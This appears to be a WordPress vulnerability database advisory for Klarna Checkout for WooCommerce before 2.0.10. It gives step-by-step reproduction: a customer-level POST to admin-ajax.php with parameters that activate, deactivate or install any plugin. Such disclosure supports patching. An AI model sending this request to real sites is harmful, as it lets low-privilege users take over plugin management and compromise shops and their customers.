Klarna Checkout for WooCommerce < 2.0.10 - Authenticated Arbitrary Plugin Deactivation, Activation and Installation

2020-04-09T00:00:00
ID WPEX-ID:10173
Type wpexploit
Reporter wpvulndb
Modified 2020-05-04T00:00:00

Description

WordPress Vulnerability - Klarna Checkout for WooCommerce < 2.0.10 - Authenticated Arbitrary Plugin Deactivation, Activation and Installation

                                        
                                            1. Install WooCommerce and the plugin
2. Register as a customer in the webshop
3. Make a post request to /wp-admin/admin-ajax.php with the payload:
action: change_klarna_addon_status
plugin_action: activate|deactivate|install
plugin_slug: woocommerce/woocommerce.php or any other WordPress plugin slug
4. See as a plugin is installed, deactivated or activated